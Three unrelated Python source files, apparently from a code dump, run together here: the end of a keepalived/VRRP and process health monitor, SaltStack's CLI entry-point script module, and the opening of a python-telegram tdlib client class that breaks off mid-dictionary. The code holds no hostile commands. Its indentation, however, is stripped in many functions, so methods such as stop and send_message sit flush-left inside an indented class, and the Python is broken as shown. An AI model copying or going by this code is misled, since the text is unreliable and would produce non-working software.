            return None, f'Error in extracting info for process {proc_name}: {e}'

        cpu_percent_threshold = self._target_procs[proc_name].cpu_percent_threshold
        if cpu_percent_threshold and proc_map['cpu_percent'] > cpu_percent_threshold:
            self._logger.warning(
                'CPU percent of process %s is %.2f, exceeding threshold %.2f',
                proc_name, proc_map['cpu_percent'], cpu_percent_threshold)
            # Still healthy (proc_map returned), but carry a warning detail.
            return proc_map, f'CPU usage is higher than threshold {cpu_percent_threshold}'

        return proc_map, None

    def _aggregate_process_stats(self, proc_map, proc_list):
        # Average CPU/memory stats over all instances of the target process.
        cpu_time_user = 0.0
        cpu_time_system = 0.0
        # iowait is Linux-only; stays None when the attribute is absent.
        cpu_time_iowait = None
        cpu_percent = 0.0
        memory_rss = 0.0
        memory_vms = 0.0
        for proc in proc_list:
            cpu_time_user += proc.info['cpu_times'].user
            cpu_time_system += proc.info['cpu_times'].system
            if hasattr(proc.info['cpu_times'], 'iowait'):
                if not cpu_time_iowait:
                    cpu_time_iowait = 0.0
                cpu_time_iowait += proc.cpu_times().iowait
            cpu_percent += proc.info['cpu_percent']
            # Bytes -> MB.
            memory_rss += proc.info['memory_info'].rss / 1e6
            memory_vms += proc.info['memory_info'].vms / 1e6
        proc_map['cpu_times_s'] = {}
        proc_map['cpu_times_s']['user'] = cpu_time_user / len(proc_list)
        proc_map['cpu_times_s']['system'] = cpu_time_system / len(proc_list)
        if cpu_time_iowait:
            proc_map['cpu_times_s']['iowait'] = cpu_time_iowait / len(proc_list)
        proc_map['cpu_percent'] = cpu_percent / len(proc_list)
        proc_map['memory_info_mb'] = {}
        proc_map['memory_info_mb']['rss'] = memory_rss / len(proc_list)
        proc_map['memory_info_mb']['vms'] = memory_vms / len(proc_list)

    def _check_connections(self):
        # Snapshot ESTABLISHED connections for each configured local port and
        # track changes of the sorted foreign-address list.
        connections = self._fetch_connections()
        connection_info = self._process_state['connections']
        connection_info['local_ports'] = {
            str(port): self._extract_conn(connections, port) for port in self._connections
        }
        conn_list = []
        for port_info in connection_info['local_ports'].values():
            for foreign_address in port_info['foreign_addresses']:
                conn_list.append(foreign_address)
        # Sort so the fingerprint string is order-independent.
        conn_list.sort()
        conn_state = str(conn_list)
        if conn_state != self._conn_state:
            self._conn_state = conn_state
            self._conn_state_count += 1
            self._logger.info('conn_state #%d: %s', self._conn_state_count, conn_state)
            connection_info['detail'] = conn_state
            connection_info['change_count'] = self._conn_state_count
            connection_info['last_change'] = self._current_time
        connection_info['last_update'] = self._current_time

    def _fetch_connections(self):
        # Parse `netstat -npa` output; returns {foreign_address: {local_port,
        # process_info}} for ESTABLISHED entries only.
        connections = {}
        with os.popen('netstat -npa 2>/dev/null') as lines:
            for line in lines:
                if 'ESTABLISHED' in line:
                    try:
                        parts = line.split()
                        local_address = parts[3]
                        local_parts = local_address.split(':')
                        local_port = int(local_parts[-1])
                        foreign_address = parts[4]
                        connections[foreign_address] = {
                            'local_port': local_port,
                            'process_info': parts[6]
                        }
                    except Exception as e:
                        self._logger.error('Processing netstat entry: %s', e)
        return connections

    def _extract_conn(self, connections, port):
        # Collect the foreign endpoints connected to a given local port and
        # the owning process entry (expected to be the same for all of them).
        foreign_addresses = {}
        process_entry = None
        for foreign_address in connections:
            entry = connections[foreign_address]
            if entry['local_port'] == port:
                new_process_entry = entry['process_info']
                if process_entry and new_process_entry != process_entry:
                    self._logger.error(
                        'Inconsistent process entry for %s: %s != %s', port, process_entry,
                        new_process_entry)
                process_entry = new_process_entry
                foreign_addresses[foreign_address] = {
                    'established': 'now'
                }
        return {
            'process_entry': process_entry,
            'foreign_addresses': foreign_addresses
        }

    def _check_vrrp_info(self):
        """Get vrrp info.

        Sends SIGUSR1 to keepalived (which dumps /tmp/keepalived.data) and
        parses the VRRP state from the dump. Any failure maps to VRRP_ERROR.
        NOTE(review): when _check_vrrp is False the early return still runs
        the finally block with vrrp_state=None — confirm this is intended.
        """
        vrrp_state = None
        error_detail = None
        try:
            if not self._check_vrrp:
                return
            with open(self._keepalived_pid_file) as pid_file:
                pid = int(pid_file.readline())
            # SIGUSR1 asks keepalived to write its state dump.
            os.kill(pid, signal.SIGUSR1)
            # Give keepalived a moment to write the dump file.
            time.sleep(1)
            with open('/tmp/keepalived.data') as stats_file:
                for line in stats_file:
                    match = re.search('State = (MASTER|BACKUP|FAULT)', line)
                    if not match:
                        continue
                    vrrp_state = match.group(1)
                    break
            if not vrrp_state:
                vrrp_state = VRRP_ERROR
                error_detail = 'Could not find matching states'
        except Exception as e:
            vrrp_state = VRRP_ERROR
            error_detail = f'Cannot get VRRP info: {e}'
        finally:
            self._vrrp_state.update(self._handle_vrrp_state(vrrp_state, error_detail))

    def _handle_vrrp_state(self, vrrp_state, error_detail=None):
        """Extract vrrp state from keepalived stats data.

        Builds the vrrp_state map (with change counters), notifies the
        active-state handler, and triggers cleanup whenever not MASTER.
        """
        vrrp_map = {'vrrp_state': vrrp_state}
        old_vrrp_map = copy.deepcopy(self._vrrp_state)
        old_vrrp_state = old_vrrp_map.get('vrrp_state')
        old_vrrp_state_detail = old_vrrp_map.get('vrrp_state_detail')

        if vrrp_state != old_vrrp_state or error_detail != old_vrrp_state_detail:
            vrrp_map['vrrp_state_last_change'] = self._current_time
            state_change_count = old_vrrp_map.get('vrrp_state_change_count', 0) + 1
            vrrp_map['vrrp_state_change_count'] = state_change_count
            self._logger.info(
                'VRRP state #%d: %s, %s', vrrp_map['vrrp_state_change_count'], vrrp_state,
                error_detail)

        if vrrp_state == VRRP_MASTER:
            vrrp_map['vrrp_state_detail'] = None
            self._active_state_handler(State.active)
        elif vrrp_state == VRRP_BACKUP:
            vrrp_map['vrrp_state_detail'] = None
            self._active_state_handler(State.inactive)
        elif vrrp_state == VRRP_FAULT:
            vrrp_map['vrrp_state_detail'] = 'VRRP is in fault state'
            self._active_state_handler(State.broken)
        elif vrrp_state == VRRP_ERROR:
            vrrp_map['vrrp_state_detail'] = error_detail
            self._active_state_handler(State.broken)
        else:
            self._logger.error('Unknown VRRP state: %s', vrrp_state)

        # Any non-master state hands resources back via the cleanup handler.
        if vrrp_state != VRRP_MASTER:
            self._cleanup_handler()

        return vrrp_map

    def _periodic_check_local_state(self):
        """Periodically gather local state and reschedule itself via Timer."""
        with self._lock:
            self._current_time = datetime.now().isoformat()
            self._check_process_info()
            self._check_vrrp_info()
            self._check_connections()
        threading.Timer(self._process_interval, self._periodic_check_local_state).start()

    def start_process_loop(self):
        """Start a loop to periodically gather local state (daemon thread)."""
        threading.Thread(target=self._periodic_check_local_state, daemon=True).start()
|
scripts.py | # -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import logging
import threading
import traceback
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def salt_master():
    '''
    Start the salt master.
    '''
    import salt.cli.daemons

    salt.cli.daemons.Master().start()
def minion_process(queue):
    '''
    Start a minion process.

    Runs in a child process spawned by salt_minion(); reports the desired
    restart delay (seconds, 0 meaning "no restart") back on *queue*.

    Fixes: deprecated ``log.warn`` -> ``log.warning``; the swallowed startup
    traceback is now logged (``exc_info=True``); unused ``as exc`` bindings
    removed.
    '''
    import salt.cli.daemons

    # salt_minion spawns this function in a new process

    def suicide_when_without_parent(parent_pid):
        '''
        Have the minion suicide if the parent process is gone

        NOTE: there is a small race issue where the parent PID could be replace
        with another process with the same PID!
        '''
        while True:
            time.sleep(5)
            try:
                # check pid alive (Unix only trick!)
                os.kill(parent_pid, 0)
            except OSError:
                # forcibly exit, regular sys.exit raises an exception-- which
                # isn't sufficient in a thread
                os._exit(999)

    if not salt.utils.is_windows():
        thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
        thread.start()

    restart = False
    minion = None
    try:
        minion = salt.cli.daemons.Minion()
        minion.start()
    except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit):  # pylint: disable=broad-except
        # Log the traceback so startup failures are diagnosable.
        log.error('Minion failed to start', exc_info=True)
        restart = True
    except SystemExit:
        restart = False

    if restart is True:
        log.warning('** Restarting minion **')
        delay = 60
        if minion is not None:
            if hasattr(minion, 'config'):
                delay = minion.config.get('random_reauth_delay', 60)
        random_delay = randint(1, delay)
        log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
        # perform delay after minion resources have been cleaned
        # NOTE(review): minion may be None here if construction failed —
        # this attribute access matches the original behavior; verify.
        if minion.options.daemon:
            time.sleep(random_delay)
            salt_minion()
        else:
            queue.put(random_delay)
    else:
        queue.put(0)
def salt_minion():
    '''
    Start the salt minion.

    On Unix this acts as a supervisor: it keeps exactly one minion
    subprocess running, restarting it after the delay the child reports on
    a multiprocessing queue (0 = clean exit, stop supervising).
    '''
    import salt.cli.daemons
    import multiprocessing
    if '' in sys.path:
        sys.path.remove('')

    if salt.utils.is_windows():
        # No fork-based supervision on Windows: run the minion in-process.
        minion = salt.cli.daemons.Minion()
        minion.start()
        return

    if '--disable-keepalive' in sys.argv:
        # Explicit opt-out of the restart supervisor.
        sys.argv.remove('--disable-keepalive')
        minion = salt.cli.daemons.Minion()
        minion.start()
        return

    # keep one minion subprocess running
    while True:
        try:
            queue = multiprocessing.Queue()
        except Exception:
            # This breaks in containers
            minion = salt.cli.daemons.Minion()
            minion.start()
            return
        process = multiprocessing.Process(target=minion_process, args=(queue,))
        process.start()
        try:
            process.join()
            try:
                # Non-blocking: the child queues its delay before exiting.
                restart_delay = queue.get(block=False)
            except Exception:
                if process.exitcode == 0:
                    # Minion process ended naturally, Ctrl+C or --version
                    break
                restart_delay = 60
            if restart_delay == 0:
                # Minion process ended naturally, Ctrl+C, --version, etc.
                break
            # delay restart to reduce flooding and allow network resources to close
            time.sleep(restart_delay)
        except KeyboardInterrupt:
            break
    # need to reset logging because new minion objects
    # cause extra log handlers to accumulate
    rlogger = logging.getLogger()
    for handler in rlogger.handlers:
        rlogger.removeHandler(handler)
    logging.basicConfig()
def proxy_minion_process(queue):
    '''
    Start a proxy minion process.

    Runs in a child process spawned by salt_proxy_minion(); reports the
    desired restart delay (seconds, 0 meaning "no restart") on *queue*.

    Fixes: deprecated ``log.warn`` -> ``log.warning``; unused ``as exc``
    bindings removed.
    '''
    import salt.cli.daemons

    # salt_minion spawns this function in a new process

    def suicide_when_without_parent(parent_pid):
        '''
        Have the minion suicide if the parent process is gone

        NOTE: there is a small race issue where the parent PID could be replace
        with another process with the same PID!
        '''
        while True:
            time.sleep(5)
            try:
                # check pid alive (Unix only trick!)
                os.kill(parent_pid, 0)
            except OSError:
                # forcibly exit, regular sys.exit raises an exception-- which
                # isn't sufficient in a thread
                os._exit(999)

    if not salt.utils.is_windows():
        thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
        thread.start()

    restart = False
    proxyminion = None
    try:
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
    except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit):  # pylint: disable=broad-except
        log.error('Proxy Minion failed to start: ', exc_info=True)
        restart = True
    except SystemExit:
        restart = False

    if restart is True:
        log.warning('** Restarting proxy minion **')
        delay = 60
        if proxyminion is not None:
            if hasattr(proxyminion, 'config'):
                delay = proxyminion.config.get('random_reauth_delay', 60)
        random_delay = randint(1, delay)
        log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
        # perform delay after minion resources have been cleaned
        queue.put(random_delay)
    else:
        queue.put(0)
def salt_proxy_minion():
    '''
    Start a proxy minion.

    On Unix this acts as a supervisor: it keeps exactly one proxy-minion
    subprocess running, restarting it after the delay the child reports on
    a multiprocessing queue (0 = clean exit, stop supervising).
    '''
    import salt.cli.daemons
    import multiprocessing
    if '' in sys.path:
        sys.path.remove('')

    if salt.utils.is_windows():
        # No fork-based supervision on Windows: run in-process.
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
        return

    if '--disable-keepalive' in sys.argv:
        # Explicit opt-out of the restart supervisor.
        sys.argv.remove('--disable-keepalive')
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
        return

    # keep one minion subprocess running
    while True:
        try:
            queue = multiprocessing.Queue()
        except Exception:
            # This breaks in containers
            proxyminion = salt.cli.daemons.ProxyMinion()
            proxyminion.start()
            return
        process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
        process.start()
        try:
            process.join()
            try:
                # Non-blocking: the child queues its delay before exiting.
                restart_delay = queue.get(block=False)
            except Exception:
                if process.exitcode == 0:
                    # Minion process ended naturally, Ctrl+C or --version
                    break
                restart_delay = 60
            if restart_delay == 0:
                # Minion process ended naturally, Ctrl+C, --version, etc.
                break
            # delay restart to reduce flooding and allow network resources to close
            time.sleep(restart_delay)
        except KeyboardInterrupt:
            break
    # need to reset logging because new minion objects
    # cause extra log handlers to accumulate
    rlogger = logging.getLogger()
    for handler in rlogger.handlers:
        rlogger.removeHandler(handler)
    logging.basicConfig()
def salt_syndic():
    '''
    Start the salt syndic.
    '''
    import salt.cli.daemons

    pid = os.getpid()
    try:
        salt.cli.daemons.Syndic().start()
    except KeyboardInterrupt:
        # Deliver SIGTERM (15) to ourselves so the daemon shuts down cleanly.
        os.kill(pid, 15)
def salt_key():
    '''
    Manage the authentication keys with salt-key.
    '''
    import salt.cli.key

    client = None
    try:
        client = salt.cli.key.SaltKey()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_cp():
    '''
    Publish commands to the salt system from the command line on the
    master.
    '''
    import salt.cli.cp

    client = None
    try:
        client = salt.cli.cp.SaltCPCli()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_call():
    '''
    Directly call a salt command in the modules, does not require a running
    salt minion to run.
    '''
    import salt.cli.call

    if '' in sys.path:
        sys.path.remove('')
    client = None
    try:
        client = salt.cli.call.SaltCall()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_run():
    '''
    Execute a salt convenience routine.
    '''
    import salt.cli.run

    if '' in sys.path:
        sys.path.remove('')
    client = None
    try:
        client = salt.cli.run.SaltRun()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_ssh():
    '''
    Execute the salt-ssh system
    '''
    import salt.cli.ssh

    if '' in sys.path:
        sys.path.remove('')
    client = None
    try:
        client = salt.cli.ssh.SaltSSH()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
    except SaltClientError as err:
        # Client-level failures are surfaced as the exit message itself.
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            hard_crash = False
        _handle_interrupt(
            SystemExit(err),
            err, hard_crash, trace=tb)
def salt_cloud():
    '''
    The main function for salt-cloud
    '''
    try:
        import salt.cloud.cli
        has_saltcloud = True
    except ImportError as e:
        log.error("Error importing salt cloud {0}".format(e))
        # No salt cloud on Windows
        has_saltcloud = False

    if '' in sys.path:
        sys.path.remove('')
    if not has_saltcloud:
        print('salt-cloud is not available in this system')
        sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)

    client = None
    try:
        client = salt.cloud.cli.SaltCloud()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_api():
    '''
    The main function for salt-api
    '''
    import salt.cli.api

    server = salt.cli.api.SaltAPI()  # pylint: disable=E1120
    server.run()
def salt_main():
    '''
    Publish commands to the salt system from the command line on the
    master.
    '''
    import salt.cli.salt

    if '' in sys.path:
        sys.path.remove('')
    client = None
    try:
        client = salt.cli.salt.SaltCMD()
        client.run()
    except KeyboardInterrupt as err:
        tb = traceback.format_exc()
        try:
            hard_crash = client.options.hard_crash
        except (AttributeError, KeyError):
            # client may be None or not fully initialised yet.
            hard_crash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err, hard_crash, trace=tb)
def salt_spm():
    '''
    The main function for spm, the Salt Package Manager

    .. versionadded:: 2015.8.0
    '''
    import salt.cli.spm

    manager = salt.cli.spm.SPM()  # pylint: disable=E1120
    manager.run()
|
client.py | import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict, Tuple, Union
from types import FrameType
from collections import defaultdict
from telegram import VERSION
from telegram.utils import AsyncResult
from telegram.tdjson import TDJson
from telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)

# tdlib update type for incoming messages, used when registering handlers.
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class Telegram:
    def __init__(
        self,
        api_id: int,
        api_hash: str,
        database_encryption_key: Union[str, bytes],
        phone: Optional[str] = None,
        bot_token: Optional[str] = None,
        library_path: Optional[str] = None,
        worker: Optional[Type[BaseWorker]] = None,
        files_directory: Optional[str] = None,
        use_test_dc: bool = False,
        use_message_database: bool = True,
        device_model: str = 'python-telegram',
        application_version: str = VERSION,
        system_version: str = 'unknown',
        system_language_code: str = 'en',
        login: bool = False,
        default_workers_queue_size: int = 1000,
        tdlib_verbosity: int = 2,
        proxy_server: str = '',
        proxy_port: int = 0,
        proxy_type: Optional[Dict[str, str]] = None,
        use_secret_chats: bool = True,
    ) -> None:
        """
        Args:
            api_id - ID of your app (https://my.telegram.org/apps/)
            api_hash - api_hash of your app (https://my.telegram.org/apps/)
            phone - your phone number
            bot_token - bot token (alternative to phone; one of the two is required)
            library_path - you can change path to the compiled libtdjson library
            worker - worker to process updates
            files_directory - directory for the tdlib's files (database, images, etc.)
            use_test_dc - use test datacenter
            use_message_database
            use_secret_chats
            device_model
            application_version
            system_version
            system_language_code
            login - when True, perform login immediately after construction
        """
        self.api_id = api_id
        self.api_hash = api_hash
        self.library_path = library_path
        self.phone = phone
        self.bot_token = bot_token
        self.use_test_dc = use_test_dc
        self.device_model = device_model
        self.system_version = system_version
        self.system_language_code = system_language_code
        self.application_version = application_version
        self.use_message_database = use_message_database
        # Seconds to wait when putting an update on a full workers queue.
        self._queue_put_timeout = 10
        self.proxy_server = proxy_server
        self.proxy_port = proxy_port
        self.proxy_type = proxy_type
        self.use_secret_chats = use_secret_chats

        if not self.bot_token and not self.phone:
            raise ValueError('You must provide bot_token or phone')

        self._database_encryption_key = database_encryption_key

        if not files_directory:
            # Derive a per-account directory name from the phone/bot token so
            # separate accounts get separate tdlib databases.
            hasher = hashlib.md5()
            str_to_encode: str = self.phone or self.bot_token  # type: ignore
            hasher.update(str_to_encode.encode('utf-8'))
            directory_name = hasher.hexdigest()
            files_directory = f'/tmp/.tdlib_files/{directory_name}/'

        self.files_directory = files_directory

        self._authorized = False
        self._is_enabled = False

        # todo: move to worker
        self._workers_queue: queue.Queue = queue.Queue(
            maxsize=default_workers_queue_size
        )

        if not worker:
            worker = SimpleWorker
        self.worker = worker(queue=self._workers_queue)

        # Pending request results keyed by request id.
        self._results: Dict[str, AsyncResult] = {}
        # Registered update handlers keyed by update type.
        self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)

        self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
        self._run()

        if login:
            self.login()
    def __del__(self) -> None:
        # Best-effort cleanup: make sure tdjson is stopped when the client
        # object is garbage-collected.
        self.stop()
def stop(self) -> None:
"""Stops the client"""
self._is_enabled = False
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def send_message(self, chat_id: int, text: str) -> AsyncResult:
"""
Sends a message to a chat. The chat must be in the tdlib's database.
If there is no chat in the DB, tdlib returns an error.
Chat is being saved to the database when the client receives a message or when you call the `get_chats` method.
Args:
chat_id
text
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
...
}
"""
data = {
'@type': 'sendMessage',
'chat_id': chat_id,
'input_message_content': {
'@type': 'inputMessageText',
'text': {'@type': 'formattedText', 'text': text},
},
}
return self._send_data(data)
def get_chat(self, chat_id: int) -> AsyncResult:
"""
This is offline request, if there is no chat in your database it will not be found
tdlib saves chat to the database when it receives a new message or when you call `get_chats` method.
"""
data = {'@type': 'getChat', 'chat_id': chat_id}
return self._send_data(data)
def get_me(self) -> AsyncResult:
"""
Requests information of the current user (getMe method)
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
"""
return self.call_method('getMe')
def get_user(self, user_id: int) -> AsyncResult:
"""
Requests information about a user with id = user_id.
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
"""
return self.call_method('getUser', params={'user_id': user_id})
def get_chats(
self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100
) -> AsyncResult:
"""
Returns a list of chats:
Returns:
{
'@type': 'chats',
'chat_ids': [...],
'@extra': {
'request_id': '...'
}
}
"""
data = {
'@type': 'getChats',
'offset_order': offset_order,
'offset_chat_id': offset_chat_id,
'limit': limit,
}
return self._send_data(data)
def get_chat_history(
self,
chat_id: int,
limit: int = 1000,
from_message_id: int = 0,
offset: int = 0,
only_local: bool = False,
) -> AsyncResult:
"""
Returns history of a chat
Args:
chat_id
limit
from_message_id
offset
only_local
"""
data = {
'@type': 'getChatHistory',
'chat_id': chat_id,
'limit': limit,
'from_message_id': from_message_id,
'offset': offset,
'only_local': only_local,
}
return self._send_data(data)
def get_message(self, chat_id: int, message_id: int,) -> AsyncResult:
"""
Return a message via its message_id
Args:
chat_id
message_id
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
'content': {...},
...
}
"""
data = {
'@type': 'getMessage',
'chat_id': chat_id,
'message_id': message_id,
}
return self._send_data(data)
def delete_messages(
self, chat_id: int, message_ids: List[int], revoke: bool = True
) -> AsyncResult:
"""
Delete a list of messages in a chat
Args:
chat_id
message_ids
revoke
"""
return self._send_data(
{
'@type': 'deleteMessages',
'chat_id': chat_id,
'message_ids': message_ids,
'revoke': revoke,
}
)
def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
"""
Get the full info of a supergroup
Args:
supergroup_id
"""
return self._send_data(
{'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id}
)
def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
"""
Create a chat from a basic group
Args:
basic_group_id
"""
return self._send_data(
{'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id}
)
def get_web_page_instant_view(
self, url: str, force_full: bool = False
) -> AsyncResult:
"""
Use this method to request instant preview of a webpage.
Returns error with 404 if there is no preview for this webpage.
Args:
url: URL of a webpage
force_full: If true, the full instant view for the web page will be returned
"""
data = {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
return self._send_data(data)
def call_method(
self,
method_name: str,
params: Optional[Dict[str, Any]] = None,
block: bool = False,
) -> AsyncResult:
"""
Use this method to call any other method of the tdlib
Args:
method_name: Name of the method
params: parameters
"""
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data, block=block)
    def _run(self) -> None:
        # Start the background receive loop and the handler worker.
        self._is_enabled = True
        # Daemon thread: must not keep the interpreter alive at exit.
        self._td_listener = threading.Thread(target=self._listen_to_td)
        self._td_listener.daemon = True
        self._td_listener.start()
        self.worker.run()
    def _listen_to_td(self) -> None:
        # Receive-loop thread body: pull updates from tdlib until the
        # client is stopped; first resolve any AsyncResult waiting for the
        # update, then dispatch it to registered handlers.
        logger.info('[Telegram.td_listener] started')
        while self._is_enabled:
            update = self._tdjson.receive()
            if update:
                self._update_async_result(update)
                self._run_handlers(update)
    def _update_async_result(
        self, update: Dict[Any, Any]
    ) -> typing.Optional[AsyncResult]:
        # Match an incoming update to the pending AsyncResult that
        # requested it (keyed by request_id under '@extra'); returns the
        # matched result or None for unsolicited updates.
        async_result = None
        _special_types = (
            'updateAuthorizationState',
        )  # for authorizationProcess @extra.request_id doesn't work
        # Authorization updates are keyed by their '@type' instead.
        if update.get('@type') in _special_types:
            request_id = update['@type']
        else:
            request_id = update.get('@extra', {}).get('request_id')
        if not request_id:
            logger.debug('request_id has not been found in the update')
        else:
            async_result = self._results.get(request_id)
        if not async_result:
            logger.debug(
                'async_result has not been found in by request_id=%s', request_id
            )
        else:
            done = async_result.parse_update(update)
            # Fully parsed: drop the pending entry from the table.
            if done:
                self._results.pop(request_id, None)
        return async_result
    def _run_handlers(self, update: Dict[Any, Any]) -> None:
        # Fan the update out to every handler registered for its '@type'.
        # Handlers run on the worker; this only enqueues (handler, update).
        update_type: str = update.get('@type', 'unknown')
        for handler in self._update_handlers[update_type]:
            self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
    def add_message_handler(self, func: Callable) -> None:
        # Convenience wrapper: register `func` for new-message updates.
        self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
    def _send_data(
        self,
        data: Dict[Any, Any],
        result_id: Optional[str] = None,
        block: bool = False,
    ) -> AsyncResult:
        """
        Sends data to tdlib.

        If `block` is True, waits for the result
        """
        if '@extra' not in data:
            data['@extra'] = {}
        # Reuse a caller-provided request_id when one is already embedded.
        if not result_id and 'request_id' in data['@extra']:
            result_id = data['@extra']['request_id']
        async_result = AsyncResult(client=self, result_id=result_id)
        # Register the pending result BEFORE sending so the receive loop
        # can match the reply by request_id.
        data['@extra']['request_id'] = async_result.id
        self._results[async_result.id] = async_result
        self._tdjson.send(data)
        async_result.request = data
        if block:
            async_result.wait(raise_exc=True)
        return async_result
    def idle(
        self, stop_signals: Tuple = (signal.SIGINT, signal.SIGTERM, signal.SIGABRT)
    ) -> None:
        """Blocks until one of the signals are received and stops"""
        for sig in stop_signals:
            signal.signal(sig, self._signal_handler)
        self._is_enabled = True
        # Sleep-poll loop; _signal_handler flips _is_enabled to break it.
        while self._is_enabled:
            time.sleep(0.1)
    def _signal_handler(self, signum: int, frame: FrameType) -> None:
        # Installed by idle(): any configured signal ends the wait loop.
        self._is_enabled = False
def get_authorization_state(self) -> AsyncResult:
logger.debug('Getting authorization state')
data = {'@type': 'getAuthorizationState'}
return self._send_data(data, result_id='getAuthorizationState')
    def login(self) -> None:
        """
        Login process (blocking)

        Must be called before any other call.
        It sends initial params to the tdlib, sets database encryption key, etc.
        """
        if self.proxy_server:
            self._send_add_proxy()
        # State machine: each tdlib authorization state maps to the action
        # that advances it; loop until _complete_authorization flips
        # self._authorized.
        authorization_state = None
        actions = {
            None: self.get_authorization_state,
            'authorizationStateWaitTdlibParameters': self._set_initial_params,
            'authorizationStateWaitEncryptionKey': self._send_encryption_key,
            'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
            'authorizationStateWaitCode': self._send_telegram_code,
            'authorizationStateWaitPassword': self._send_password,
            'authorizationStateReady': self._complete_authorization,
        }
        if self.phone:
            logger.info('[login] Login process has been started with phone')
        else:
            logger.info('[login] Login process has been started with bot token')
        while not self._authorized:
            logger.info('[login] current authorization state: %s', authorization_state)
            result = actions[authorization_state]()
            # Some actions (e.g. _complete_authorization) return None.
            if result:
                result.wait(raise_exc=True)
                if result.update is None:
                    raise RuntimeError('Something wrong, the result update is None')
                # getAuthorizationState replies with the state object itself;
                # other requests nest it under 'authorization_state'.
                if result.id == 'getAuthorizationState':
                    authorization_state = result.update['@type']
                else:
                    authorization_state = result.update['authorization_state']['@type']
    def _set_initial_params(self) -> AsyncResult:
        # First step of the login state machine: hand tdlib its required
        # setup parameters (API credentials, storage paths, etc.).
        logger.info(
            'Setting tdlib initial params: files_dir=%s, test_dc=%s',
            self.files_directory,
            self.use_test_dc,
        )
        data = {
            # todo: params
            '@type': 'setTdlibParameters',
            'parameters': {
                'use_test_dc': self.use_test_dc,
                'api_id': self.api_id,
                'api_hash': self.api_hash,
                'device_model': self.device_model,
                'system_version': self.system_version,
                'application_version': self.application_version,
                'system_language_code': self.system_language_code,
